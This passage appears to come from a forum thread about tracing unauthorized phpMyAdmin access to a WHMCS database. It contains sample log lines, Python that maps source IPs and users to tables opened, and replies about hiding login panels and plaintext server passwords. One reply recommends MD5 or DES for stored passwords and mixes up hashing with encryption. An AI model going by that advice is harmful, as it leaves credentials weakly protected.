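203.0.113.7 - dbuser [22/Jan/2012:01:49:01 -0800] "GET /phpmyadmin/sql.php?db=shop_db&token=TOKEN&table=tblservers&pos=0 HTTP/1.1" 200 36728 "https://example.test/phpmyadmin/navigation.php?token=TOKEN&db=shop_db" "Mozilla/5.0"
198.51.100.9 - dbuser [22/Jan/2012:02:10:00 -0800] "GET /phpmyadmin/db_structure.php?token=TOKEN2&db=shop_db HTTP/1.1" 200 275988 "-" "Mozilla/5.0"
'''

def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split()
    # Timed-out connections are logged with "-" as the request (status 408).
    if len(parts) != 3:
        rec.update(method=None, path=None, query={})
        return rec
    url = urlsplit(parts[1])
    rec.update(method=parts[0], path=url.path, query=parse_qs(url.query))
    return rec

def page_views(lines):
    """Keep script requests; drop static assets, empty requests and junk lines."""
    views = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["path"] is None:
            continue
        if rec["path"].lower().endswith(STATIC_EXT):
            continue
        views.append(rec)
    return views

def tables_touched(views):
    """Map (ip, user) -> {database: set of tables opened in that database}."""
    seen = defaultdict(lambda: defaultdict(set))
    for v in views:
        for db in v["query"].get("db", []):
            seen[(v["ip"], v["user"])][db].update(v["query"].get("table", []))
    return {key: dict(dbs) for key, dbs in seen.items()}
```

Running `tables_touched(page_views(open(path)))` over a real access log gives one entry per source IP and authenticated user, which makes a second address using the same account stand out.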
 
Yeah, hackers tend to just Google their victims. If certain login panels and CMSs don't need to be found in Google, you could consider restricting access to crawlers. Unless you're a specific target, you'll dodge some bullets.
 
Looking at tblservers, I see the password is set to text. Should be at least MD5 if not DES. I'll have to find out from WHMCS what it's supposed to be. Does anyone know by chance? Still, he would have had to decrypt. I don't think that's easy to do.
 